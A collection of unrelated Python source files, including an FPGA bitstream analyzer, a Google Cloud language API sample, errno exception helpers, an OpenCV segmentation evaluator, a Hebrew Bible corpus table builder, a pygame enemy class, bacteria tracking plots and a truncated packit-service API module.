[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
'''
Spartan 6 bitstream analyzer tool.
This script reads a Spartan6 bitstream and prints out some useful information.
It can also create a frames file with the configuration data words.
The bitstream is analyzed word by word and interpreted according to
the UG380 Configuration User Guide.
The tool can be used to derive the initialization, startup and finalization
sequence as well as the configuration data. The latter is written to a frames
file which can be used by the bitstream tools such as frames2bit to generate
a valid bitstream.
'''
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
'''
Yields all starting positions of copies of the pattern in the text.
Calling conventions are similar to string.find, but its arguments can be
lists or iterators, not just strings, it returns all matches, not just
the first one, and it does not need the whole text in memory at once.
Whenever it yields, it will have read the text exactly up to and including
the match that caused the yield.
'''
# allow indexing into pattern and protect against change during yield
pattern = list(pattern)
# build table of shift amounts
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
"word_count": word_count
}
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
#decryption
dec = (word >> 6) & 1
#security bits
sb = (word >> 4) & 3
#persist
p = (word >> 3) & 1
#use efuse
efuse = (word >> 2) & 1
#crc extstat disable
crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.current_far_maj = word
elif payload_len == 1:
self.current_far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
# Check if 0 words actually means read something
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
'''Write frame data in a more readable format'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
#IOB word
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
'''Write configuration data to frames file'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DO NOT EDIT! This is a generated sample ("Request", "language_entities_text")
# To install the latest published package dependency, execute the following:
# pip install google-cloud-language
import sys
# [START language_entities_text]
from google.cloud import language_v1
from google.cloud.language_v1 import enums
from google.cloud.language_v1 import enums
import six
def sample_analyze_entities(text_content):
"""Analyze entities in text"""
# [START language_entities_text_core]
client = language_v1.LanguageServiceClient()
# text_content = 'California is a state.'
if isinstance(text_content, six.binary_type):
text_content = text_content.decode('utf-8')
type_ = enums.Document.Type.PLAIN_TEXT
document = {'type': type_, 'content': text_content}
response = client.analyze_entities(document)
for entity in response.entities:
print('Entity name: {}'.format(entity.name))
print('Entity type: {}'.format(enums.Entity.Type(entity.type).name))
print('Entity salience score: {}'.format(entity.salience))
for mention in entity.mentions:
print('Mention: {}'.format(mention.text.content))
print('Mention type: {}'.format(
enums.EntityMention.Type(mention.type).name))
# [END language_entities_text_core]
# [END language_entities_text]
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--text_content', type=str, default='California is a state.')
args = parser.parse_args()
sample_analyze_entities(args.text_content)
if __name__ == '__main__':
main()
|
"""
create errno-specific classes for IO or os calls.
"""
import sys, os, errno
class Error(EnvironmentError):
def __repr__(self):
return "%s.%s %r: %s " %(self.__class__.__module__,
self.__class__.__name__,
self.__class__.__doc__,
" ".join(map(str, self.args)),
#repr(self.args)
)
def __str__(self):
s = "[%s]: %s" %(self.__class__.__doc__,
" ".join(map(str, self.args)),
)
return s
_winerrnomap = {
2: errno.ENOENT,
3: errno.ENOENT,
17: errno.EEXIST,
13: errno.EBUSY, # empty cd drive, but ENOMEDIUM seems unavailiable
22: errno.ENOTDIR,
267: errno.ENOTDIR,
5: errno.EACCES, # anything better?
}
class ErrorMaker(object):
""" lazily provides Exception classes for each possible POSIX errno
(as defined per the 'errno' module). All such instances
subclass EnvironmentError.
"""
Error = Error
_errno2class = {}
def __getattr__(self, name):
if name[0] == "_":
raise AttributeError(name)
eno = getattr(errno, name)
cls = self._geterrnoclass(eno)
setattr(self, name, cls)
return cls
def _geterrnoclass(self, eno):
try:
return self._errno2class[eno]
except KeyError:
clsname = errno.errorcode.get(eno, "UnknownErrno%d" %(eno,))
errorcls = type(Error)(clsname, (Error,),
{'__module__':'py.error',
'__doc__': os.strerror(eno)})
self._errno2class[eno] = errorcls
return errorcls
def checked_call(self, func, *args, **kwargs):
""" call a function and raise an errno-exception if applicable. """
__tracebackhide__ = True
try:
return func(*args, **kwargs)
except self.Error:
raise
except EnvironmentError:
cls, value, tb = sys.exc_info()
if not hasattr(value, 'errno'):
raise
__tracebackhide__ = False
errno = value.errno
try:
if not isinstance(value, WindowsError):
raise NameError
except NameError:
# we are not on Windows, or we got a proper OSError
cls = self._geterrnoclass(errno)
else:
try:
cls = self._geterrnoclass(_winerrnomap[errno])
except KeyError:
raise value
raise cls("%s%r" % (func.__name__, args))
__tracebackhide__ = True
error = ErrorMaker()
|
import numpy as np
import sys
import os
import fnmatch
import argparse
try:
import cv2 as cv
except ImportError:
raise ImportError('Can\'t find OpenCV Python module. If you\'ve built it from sources without installation, '
'configure environment variable PYTHONPATH to "opencv_build_dir/lib" directory (with "python3" subdirectory if required)')
try:
import torch
except ImportError:
raise ImportError('Can\'t find pytorch. Please install it by following instructions on the official site')
from torch.utils.serialization import load_lua
from pascal_semsegm_test_fcn import eval_segm_result, get_conf_mat, get_metrics, DatasetImageFetch, SemSegmEvaluation
from imagenet_cls_test_alexnet import Framework, DnnCaffeModel
class NormalizePreproc:
def __init__(self):
pass
@staticmethod
def process(img):
image_data = np.array(img).transpose(2, 0, 1).astype(np.float32)
image_data = np.expand_dims(image_data, 0)
image_data /= 255.0
return image_data
class CityscapesDataFetch(DatasetImageFetch):
img_dir = ''
segm_dir = ''
segm_files = []
colors = []
i = 0
def __init__(self, img_dir, segm_dir, preproc):
self.img_dir = img_dir
self.segm_dir = segm_dir
self.segm_files = sorted([img for img in self.locate('*_color.png', segm_dir)])
self.colors = self.get_colors()
self.data_prepoc = preproc
self.i = 0
@staticmethod
def get_colors():
result = []
colors_list = (
(0, 0, 0), (128, 64, 128), (244, 35, 232), (70, 70, 70), (102, 102, 156), (190, 153, 153), (153, 153, 153),
(250, 170, 30), (220, 220, 0), (107, 142, 35), (152, 251, 152), (70, 130, 180), (220, 20, 60), (255, 0, 0),
(0, 0, 142), (0, 0, 70), (0, 60, 100), (0, 80, 100), (0, 0, 230), (119, 11, 32))
for c in colors_list:
result.append(DatasetImageFetch.pix_to_c(c))
return result
def __iter__(self):
return self
def next(self):
if self.i < len(self.segm_files):
segm_file = self.segm_files[self.i]
segm = cv.imread(segm_file, cv.IMREAD_COLOR)[:, :, ::-1]
segm = cv.resize(segm, (1024, 512), interpolation=cv.INTER_NEAREST)
img_file = self.rreplace(self.img_dir + segm_file[len(self.segm_dir):], 'gtFine_color', 'leftImg8bit')
assert os.path.exists(img_file)
img = cv.imread(img_file, cv.IMREAD_COLOR)[:, :, ::-1]
img = cv.resize(img, (1024, 512))
self.i += 1
gt = self.color_to_gt(segm, self.colors)
img = self.data_prepoc.process(img)
return img, gt
else:
self.i = 0
raise StopIteration
def get_num_classes(self):
return len(self.colors)
@staticmethod
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
@staticmethod
def rreplace(s, old, new, occurrence=1):
li = s.rsplit(old, occurrence)
return new.join(li)
class TorchModel(Framework):
net = object
def __init__(self, model_file):
self.net = load_lua(model_file)
def get_name(self):
return 'Torch'
def get_output(self, input_blob):
tensor = torch.FloatTensor(input_blob)
out = self.net.forward(tensor).numpy()
return out
class DnnTorchModel(DnnCaffeModel):
net = cv.dnn.Net()
def __init__(self, model_file):
self.net = cv.dnn.readNetFromTorch(model_file)
def get_output(self, input_blob):
self.net.setBlob("", input_blob)
self.net.forward()
return self.net.getBlob(self.net.getLayerNames()[-1])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--imgs_dir", help="path to Cityscapes validation images dir, imgsfine/leftImg8bit/val")
parser.add_argument("--segm_dir", help="path to Cityscapes dir with segmentation, gtfine/gtFine/val")
parser.add_argument("--model", help="path to torch model, download it here: "
"https://www.dropbox.com/sh/dywzk3gyb12hpe5/AAD5YkUa8XgMpHs2gCRgmCVCa")
parser.add_argument("--log", help="path to logging file")
args = parser.parse_args()
prep = NormalizePreproc()
df = CityscapesDataFetch(args.imgs_dir, args.segm_dir, prep)
fw = [TorchModel(args.model),
DnnTorchModel(args.model)]
segm_eval = SemSegmEvaluation(args.log)
segm_eval.process(fw, df)
|
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
# NB that working directory when script is executed is
# /workflow; because we have some utilities that we want
# to run from above directory, we need to append it to path
sys.path.append('scripts')
from build_tables import build_sample_tables
# fire up Text-Fabric with BHSA data
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
# load GBI Hebrew data
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
# preprocess data
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
"""Join words on a char and ensure they are pre/appended with that char.
The pre/appending provides easy-to-match word boundaries.
"""
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
def get_preceding_words(node, context='clause'):
"""Retrieves words from before a verb within a context"""
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
"""Compile all relevant BHSA data for a given node."""
# data on this clause itself
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
# work around for participle contexts without
# clause data
if verbform == 'ptcp' and clause_type != 'Ptcp':
cl_args = None
has_q = None
cl_args = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1 # look for question particles
cl_args = re.match('.*V', cl_args)[0] # NB ignore post-verbal arguments
# collect preceding particles only
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
# provide clause argument data
# objects
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
# locatives
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
# convert to boolean 0 or 1 to avoid indexing
# pivot tables with booleans
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
"""Retrieve data on a nearby clause_atom, if it exists
Args:
clatom_lookup: iterable of clause_atom nodes or empty
Returns:
dict of data on the first clause_atom in the lookup, if
one was found, else an empty dict
"""
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
# retrive data on first clause in the lookup; if there is one
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa) # domain with permissive Q
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
# capture text in between starting node and this one
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
"""Retrieve data on related clauses."""
clause_atom = L.u(node, 'clause_atom')[0]
# build data on the mother/daughter clause
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
|
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 09 09:59:13 2017
@author: as624
"""
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
"""
Produces and saves figures showing the output from the detection
Parameters
------
image : ndarray (2D)
The initial image that detection was run on
wells : ndarray (2D) of dtype int
A labelled image showing the detected wells
bacteria : ndarray (2D) of dtype int
A labelled image showing the detected bacteria
timeindex : int
The timepoint that has been analysed
output_dir : str (path)
Where to save the images
"""
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
#plt.contour(channel>0, levels=[0.5], colors=['r'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
"""
Produces and saves figures showing the output after tracking
Parameters
------
data : list of ndarrays
List of initial image that detection was run on
fullwellimages : list of ndarrays
List of labelled images showing the detected wells
wellcoords : list of arrays
Each entry contains a further list where each entry contains well coordinates
allbacteria : list of arrays
List of labelled images showing the detected bacteria
output_dir : str (path)
Where to save the images
bacteria_lineage : dictionary
A dictionary that links the physical unique label of a bacteria
to one which shows information on its lineage
"""
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
# Add in well labels top left(?) of well contour
#bw = fullwells == welllabel
# if not np.any(bw):
# continue
#pos0 = bw.nonzero()
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
#lab_string = label_dict_string[lab_bac]
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
"""outputs a final csv with information on the bacteria detected
Parameters
------
measurements : Custom class instance
Its attribute "bacteria" is a dictionary containing information on
each individual bacteria
output_dir : str (path)
Where to write the csv
"""
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
|
# MIT License
#
# Copyright (c) 2019 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
"""List all Github App installations"""
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
